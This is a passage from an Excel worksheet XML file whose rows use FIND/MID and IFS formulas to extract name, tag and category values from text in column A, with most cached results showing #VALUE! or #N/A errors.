      <c r="F3392" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3393" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3393" t="s">
        <v>2657</v>
      </c>
      <c r="B3393" t="e">
        <f t="shared" si="157"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3393" t="e">
        <f t="shared" si="158"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3393" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3393" t="e" cm="1">
        <f t="array" ref="E3393">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3393)), MID($A3393, FIND("name=",$A3393) + 5, LEN($A3393) - FIND("name=",$A3393)),
    ISNUMBER(FIND("tag/",$A3393)), MID($A3393, FIND("tag/",$A3393) + 4, LEN($A3393) - FIND("tag/",$A3393)),
    ISNUMBER(FIND("category",$A3393)), MID($A3393, FIND("category",$A3393) + 9, LEN($A3393) - FIND("category",$A3393)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3393" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3394" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3394" t="s">
        <v>2658</v>
      </c>
      <c r="B3394" t="e">
        <f t="shared" si="157"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3394" t="e">
        <f t="shared" si="158"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3394" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3394" t="e" cm="1">
        <f t="array" ref="E3394">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3394)), MID($A3394, FIND("name=",$A3394) + 5, LEN($A3394) - FIND("name=",$A3394)),
    ISNUMBER(FIND("tag/",$A3394)), MID($A3394, FIND("tag/",$A3394) + 4, LEN($A3394) - FIND("tag/",$A3394)),
    ISNUMBER(FIND("category",$A3394)), MID($A3394, FIND("category",$A3394) + 9, LEN($A3394) - FIND("category",$A3394)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3394" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3395" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3395" t="s">
        <v>2659</v>
      </c>
      <c r="B3395" t="e">
        <f t="shared" si="157"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3395" t="e">
        <f t="shared" si="158"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3395" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3395" t="e" cm="1">
        <f t="array" ref="E3395">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3395)), MID($A3395, FIND("name=",$A3395) + 5, LEN($A3395) - FIND("name=",$A3395)),
    ISNUMBER(FIND("tag/",$A3395)), MID($A3395, FIND("tag/",$A3395) + 4, LEN($A3395) - FIND("tag/",$A3395)),
    ISNUMBER(FIND("category",$A3395)), MID($A3395, FIND("category",$A3395) + 9, LEN($A3395) - FIND("category",$A3395)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3395" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3396" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3396" t="s">
        <v>2660</v>
      </c>
      <c r="B3396" t="e">
        <f t="shared" si="157"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3396" t="e">
        <f t="shared" si="158"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3396" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3396" t="e" cm="1">
        <f t="array" ref="E3396">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3396)), MID($A3396, FIND("name=",$A3396) + 5, LEN($A3396) - FIND("name=",$A3396)),
    ISNUMBER(FIND("tag/",$A3396)), MID($A3396, FIND("tag/",$A3396) + 4, LEN($A3396) - FIND("tag/",$A3396)),
    ISNUMBER(FIND("category",$A3396)), MID($A3396, FIND("category",$A3396) + 9, LEN($A3396) - FIND("category",$A3396)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3396" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3397" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3397" t="s">
        <v>2661</v>
      </c>
      <c r="B3397" t="e">
        <f t="shared" si="157"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3397" t="e">
        <f t="shared" si="158"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3397" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3397" t="e" cm="1">
        <f t="array" ref="E3397">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3397)), MID($A3397, FIND("name=",$A3397) + 5, LEN($A3397) - FIND("name=",$A3397)),
    ISNUMBER(FIND("tag/",$A3397)), MID($A3397, FIND("tag/",$A3397) + 4, LEN($A3397) - FIND("tag/",$A3397)),
    ISNUMBER(FIND("category",$A3397)), MID($A3397, FIND("category",$A3397) + 9, LEN($A3397) - FIND("category",$A3397)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3397" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3398" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3398" t="s">
        <v>2662</v>
      </c>
      <c r="B3398" t="e">
        <f t="shared" ref="B3398:B3461" si="160">IF(FIND("name=",A3398,1)&gt;0,MID(A3398,FIND("name=",A3398,1)+5,LEN(A3398)-FIND("name=",A3398,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C3398" t="e">
        <f t="shared" ref="C3398:C3461" si="161">IF(FIND("tag/",$A3398,1)&gt;0,MID($A3398,FIND("tag/",$A3398,1)+4,LEN($A3398)-FIND("tag/",$A3398,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D3398" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3398" t="e" cm="1">
        <f t="array" ref="E3398">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3398)), MID($A3398, FIND("name=",$A3398) + 5, LEN($A3398) - FIND("name=",$A3398)),
    ISNUMBER(FIND("tag/",$A3398)), MID($A3398, FIND("tag/",$A3398) + 4, LEN($A3398) - FIND("tag/",$A3398)),
    ISNUMBER(FIND("category",$A3398)), MID($A3398, FIND("category",$A3398) + 9, LEN($A3398) - FIND("category",$A3398)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3398" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3399" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3399" t="s">
        <v>2663</v>
      </c>
      <c r="B3399" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3399" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3399" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3399" t="e" cm="1">
        <f t="array" ref="E3399">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3399)), MID($A3399, FIND("name=",$A3399) + 5, LEN($A3399) - FIND("name=",$A3399)),
    ISNUMBER(FIND("tag/",$A3399)), MID($A3399, FIND("tag/",$A3399) + 4, LEN($A3399) - FIND("tag/",$A3399)),
    ISNUMBER(FIND("category",$A3399)), MID($A3399, FIND("category",$A3399) + 9, LEN($A3399) - FIND("category",$A3399)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3399" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3400" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3400" t="s">
        <v>2664</v>
      </c>
      <c r="B3400" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3400" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3400" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3400" t="e" cm="1">
        <f t="array" ref="E3400">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3400)), MID($A3400, FIND("name=",$A3400) + 5, LEN($A3400) - FIND("name=",$A3400)),
    ISNUMBER(FIND("tag/",$A3400)), MID($A3400, FIND("tag/",$A3400) + 4, LEN($A3400) - FIND("tag/",$A3400)),
    ISNUMBER(FIND("category",$A3400)), MID($A3400, FIND("category",$A3400) + 9, LEN($A3400) - FIND("category",$A3400)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3400" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3401" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3401" t="s">
        <v>2665</v>
      </c>
      <c r="B3401" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3401" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3401" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3401" t="e" cm="1">
        <f t="array" ref="E3401">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3401)), MID($A3401, FIND("name=",$A3401) + 5, LEN($A3401) - FIND("name=",$A3401)),
    ISNUMBER(FIND("tag/",$A3401)), MID($A3401, FIND("tag/",$A3401) + 4, LEN($A3401) - FIND("tag/",$A3401)),
    ISNUMBER(FIND("category",$A3401)), MID($A3401, FIND("category",$A3401) + 9, LEN($A3401) - FIND("category",$A3401)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3401" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3402" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3402" t="s">
        <v>2666</v>
      </c>
      <c r="B3402" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3402" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3402" t="e">
        <f t="shared" si="159"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3402" t="e" cm="1">
        <f t="array" ref="E3402">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3402)), MID($A3402, FIND("name=",$A3402) + 5, LEN($A3402) - FIND("name=",$A3402)),
    ISNUMBER(FIND("tag/",$A3402)), MID($A3402, FIND("tag/",$A3402) + 4, LEN($A3402) - FIND("tag/",$A3402)),
    ISNUMBER(FIND("category",$A3402)), MID($A3402, FIND("category",$A3402) + 9, LEN($A3402) - FIND("category",$A3402)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3402" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3403" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3403" t="s">
        <v>2667</v>
      </c>
      <c r="B3403" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3403" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3403" t="e">
        <f t="shared" ref="D3403:D3466" si="162">IF(FIND("category",$A3403,1)&gt;0,MID($A3403,FIND("category",$A3403,1)+9,LEN($A3403)-FIND("category",$A3403,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E3403" t="e" cm="1">
        <f t="array" ref="E3403">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3403)), MID($A3403, FIND("name=",$A3403) + 5, LEN($A3403) - FIND("name=",$A3403)),
    ISNUMBER(FIND("tag/",$A3403)), MID($A3403, FIND("tag/",$A3403) + 4, LEN($A3403) - FIND("tag/",$A3403)),
    ISNUMBER(FIND("category",$A3403)), MID($A3403, FIND("category",$A3403) + 9, LEN($A3403) - FIND("category",$A3403)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3403" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3404" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3404" t="s">
        <v>2669</v>
      </c>
      <c r="B3404" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3404" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3404" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3404" t="e" cm="1">
        <f t="array" ref="E3404">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3404)), MID($A3404, FIND("name=",$A3404) + 5, LEN($A3404) - FIND("name=",$A3404)),
    ISNUMBER(FIND("tag/",$A3404)), MID($A3404, FIND("tag/",$A3404) + 4, LEN($A3404) - FIND("tag/",$A3404)),
    ISNUMBER(FIND("category",$A3404)), MID($A3404, FIND("category",$A3404) + 9, LEN($A3404) - FIND("category",$A3404)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3404" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3405" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3405" t="s">
        <v>2670</v>
      </c>
      <c r="B3405" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3405" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3405" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3405" t="e" cm="1">
        <f t="array" ref="E3405">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3405)), MID($A3405, FIND("name=",$A3405) + 5, LEN($A3405) - FIND("name=",$A3405)),
    ISNUMBER(FIND("tag/",$A3405)), MID($A3405, FIND("tag/",$A3405) + 4, LEN($A3405) - FIND("tag/",$A3405)),
    ISNUMBER(FIND("category",$A3405)), MID($A3405, FIND("category",$A3405) + 9, LEN($A3405) - FIND("category",$A3405)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3405" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3406" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3406" t="s">
        <v>2671</v>
      </c>
      <c r="B3406" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3406" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3406" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3406" t="e" cm="1">
        <f t="array" ref="E3406">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3406)), MID($A3406, FIND("name=",$A3406) + 5, LEN($A3406) - FIND("name=",$A3406)),
    ISNUMBER(FIND("tag/",$A3406)), MID($A3406, FIND("tag/",$A3406) + 4, LEN($A3406) - FIND("tag/",$A3406)),
    ISNUMBER(FIND("category",$A3406)), MID($A3406, FIND("category",$A3406) + 9, LEN($A3406) - FIND("category",$A3406)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3406" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3407" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3407" t="s">
        <v>2672</v>
      </c>
      <c r="B3407" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3407" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3407" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3407" t="e" cm="1">
        <f t="array" ref="E3407">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3407)), MID($A3407, FIND("name=",$A3407) + 5, LEN($A3407) - FIND("name=",$A3407)),
    ISNUMBER(FIND("tag/",$A3407)), MID($A3407, FIND("tag/",$A3407) + 4, LEN($A3407) - FIND("tag/",$A3407)),
    ISNUMBER(FIND("category",$A3407)), MID($A3407, FIND("category",$A3407) + 9, LEN($A3407) - FIND("category",$A3407)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3407" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3408" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3408" t="s">
        <v>2673</v>
      </c>
      <c r="B3408" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3408" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3408" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3408" t="e" cm="1">
        <f t="array" ref="E3408">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3408)), MID($A3408, FIND("name=",$A3408) + 5, LEN($A3408) - FIND("name=",$A3408)),
    ISNUMBER(FIND("tag/",$A3408)), MID($A3408, FIND("tag/",$A3408) + 4, LEN($A3408) - FIND("tag/",$A3408)),
    ISNUMBER(FIND("category",$A3408)), MID($A3408, FIND("category",$A3408) + 9, LEN($A3408) - FIND("category",$A3408)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3408" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3409" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3409" t="s">
        <v>2674</v>
      </c>
      <c r="B3409" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3409" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3409" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3409" t="e" cm="1">
        <f t="array" ref="E3409">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3409)), MID($A3409, FIND("name=",$A3409) + 5, LEN($A3409) - FIND("name=",$A3409)),
    ISNUMBER(FIND("tag/",$A3409)), MID($A3409, FIND("tag/",$A3409) + 4, LEN($A3409) - FIND("tag/",$A3409)),
    ISNUMBER(FIND("category",$A3409)), MID($A3409, FIND("category",$A3409) + 9, LEN($A3409) - FIND("category",$A3409)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3409" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3410" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3410" t="s">
        <v>2675</v>
      </c>
      <c r="B3410" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3410" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3410" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3410" t="e" cm="1">
        <f t="array" ref="E3410">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3410)), MID($A3410, FIND("name=",$A3410) + 5, LEN($A3410) - FIND("name=",$A3410)),
    ISNUMBER(FIND("tag/",$A3410)), MID($A3410, FIND("tag/",$A3410) + 4, LEN($A3410) - FIND("tag/",$A3410)),
    ISNUMBER(FIND("category",$A3410)), MID($A3410, FIND("category",$A3410) + 9, LEN($A3410) - FIND("category",$A3410)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3410" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3411" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3411" t="s">
        <v>2676</v>
      </c>
      <c r="B3411" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3411" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3411" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3411" t="e" cm="1">
        <f t="array" ref="E3411">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3411)), MID($A3411, FIND("name=",$A3411) + 5, LEN($A3411) - FIND("name=",$A3411)),
    ISNUMBER(FIND("tag/",$A3411)), MID($A3411, FIND("tag/",$A3411) + 4, LEN($A3411) - FIND("tag/",$A3411)),
    ISNUMBER(FIND("category",$A3411)), MID($A3411, FIND("category",$A3411) + 9, LEN($A3411) - FIND("category",$A3411)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3411" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3412" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3412" t="s">
        <v>2677</v>
      </c>
      <c r="B3412" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3412" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3412" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3412" t="e" cm="1">
        <f t="array" ref="E3412">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3412)), MID($A3412, FIND("name=",$A3412) + 5, LEN($A3412) - FIND("name=",$A3412)),
    ISNUMBER(FIND("tag/",$A3412)), MID($A3412, FIND("tag/",$A3412) + 4, LEN($A3412) - FIND("tag/",$A3412)),
    ISNUMBER(FIND("category",$A3412)), MID($A3412, FIND("category",$A3412) + 9, LEN($A3412) - FIND("category",$A3412)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3412" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3413" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3413" t="s">
        <v>2679</v>
      </c>
      <c r="B3413" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3413" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3413" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3413" t="e" cm="1">
        <f t="array" ref="E3413">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3413)), MID($A3413, FIND("name=",$A3413) + 5, LEN($A3413) - FIND("name=",$A3413)),
    ISNUMBER(FIND("tag/",$A3413)), MID($A3413, FIND("tag/",$A3413) + 4, LEN($A3413) - FIND("tag/",$A3413)),
    ISNUMBER(FIND("category",$A3413)), MID($A3413, FIND("category",$A3413) + 9, LEN($A3413) - FIND("category",$A3413)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3413" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3414" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3414" t="s">
        <v>2680</v>
      </c>
      <c r="B3414" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3414" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3414" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3414" t="e" cm="1">
        <f t="array" ref="E3414">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3414)), MID($A3414, FIND("name=",$A3414) + 5, LEN($A3414) - FIND("name=",$A3414)),
    ISNUMBER(FIND("tag/",$A3414)), MID($A3414, FIND("tag/",$A3414) + 4, LEN($A3414) - FIND("tag/",$A3414)),
    ISNUMBER(FIND("category",$A3414)), MID($A3414, FIND("category",$A3414) + 9, LEN($A3414) - FIND("category",$A3414)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3414" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3415" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3415" t="s">
        <v>2681</v>
      </c>
      <c r="B3415" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3415" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3415" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3415" t="e" cm="1">
        <f t="array" ref="E3415">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3415)), MID($A3415, FIND("name=",$A3415) + 5, LEN($A3415) - FIND("name=",$A3415)),
    ISNUMBER(FIND("tag/",$A3415)), MID($A3415, FIND("tag/",$A3415) + 4, LEN($A3415) - FIND("tag/",$A3415)),
    ISNUMBER(FIND("category",$A3415)), MID($A3415, FIND("category",$A3415) + 9, LEN($A3415) - FIND("category",$A3415)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3415" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3416" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3416" t="s">
        <v>2682</v>
      </c>
      <c r="B3416" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3416" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3416" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3416" t="e" cm="1">
        <f t="array" ref="E3416">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3416)), MID($A3416, FIND("name=",$A3416) + 5, LEN($A3416) - FIND("name=",$A3416)),
    ISNUMBER(FIND("tag/",$A3416)), MID($A3416, FIND("tag/",$A3416) + 4, LEN($A3416) - FIND("tag/",$A3416)),
    ISNUMBER(FIND("category",$A3416)), MID($A3416, FIND("category",$A3416) + 9, LEN($A3416) - FIND("category",$A3416)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3416" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3417" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3417" t="s">
        <v>2683</v>
      </c>
      <c r="B3417" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3417" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3417" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3417" t="e" cm="1">
        <f t="array" ref="E3417">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3417)), MID($A3417, FIND("name=",$A3417) + 5, LEN($A3417) - FIND("name=",$A3417)),
    ISNUMBER(FIND("tag/",$A3417)), MID($A3417, FIND("tag/",$A3417) + 4, LEN($A3417) - FIND("tag/",$A3417)),
    ISNUMBER(FIND("category",$A3417)), MID($A3417, FIND("category",$A3417) + 9, LEN($A3417) - FIND("category",$A3417)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3417" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3418" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3418" t="s">
        <v>2684</v>
      </c>
      <c r="B3418" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3418" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3418" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3418" t="e" cm="1">
        <f t="array" ref="E3418">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3418)), MID($A3418, FIND("name=",$A3418) + 5, LEN($A3418) - FIND("name=",$A3418)),
    ISNUMBER(FIND("tag/",$A3418)), MID($A3418, FIND("tag/",$A3418) + 4, LEN($A3418) - FIND("tag/",$A3418)),
    ISNUMBER(FIND("category",$A3418)), MID($A3418, FIND("category",$A3418) + 9, LEN($A3418) - FIND("category",$A3418)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3418" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3419" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3419" t="s">
        <v>2685</v>
      </c>
      <c r="B3419" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3419" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3419" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3419" t="e" cm="1">
        <f t="array" ref="E3419">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3419)), MID($A3419, FIND("name=",$A3419) + 5, LEN($A3419) - FIND("name=",$A3419)),
    ISNUMBER(FIND("tag/",$A3419)), MID($A3419, FIND("tag/",$A3419) + 4, LEN($A3419) - FIND("tag/",$A3419)),
    ISNUMBER(FIND("category",$A3419)), MID($A3419, FIND("category",$A3419) + 9, LEN($A3419) - FIND("category",$A3419)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3419" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3420" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3420" t="s">
        <v>2686</v>
      </c>
      <c r="B3420" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3420" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3420" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3420" t="e" cm="1">
        <f t="array" ref="E3420">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3420)), MID($A3420, FIND("name=",$A3420) + 5, LEN($A3420) - FIND("name=",$A3420)),
    ISNUMBER(FIND("tag/",$A3420)), MID($A3420, FIND("tag/",$A3420) + 4, LEN($A3420) - FIND("tag/",$A3420)),
    ISNUMBER(FIND("category",$A3420)), MID($A3420, FIND("category",$A3420) + 9, LEN($A3420) - FIND("category",$A3420)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3420" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3421" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3421" t="s">
        <v>2687</v>
      </c>
      <c r="B3421" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3421" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3421" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3421" t="e" cm="1">
        <f t="array" ref="E3421">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3421)), MID($A3421, FIND("name=",$A3421) + 5, LEN($A3421) - FIND("name=",$A3421)),
    ISNUMBER(FIND("tag/",$A3421)), MID($A3421, FIND("tag/",$A3421) + 4, LEN($A3421) - FIND("tag/",$A3421)),
    ISNUMBER(FIND("category",$A3421)), MID($A3421, FIND("category",$A3421) + 9, LEN($A3421) - FIND("category",$A3421)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3421" t="e">
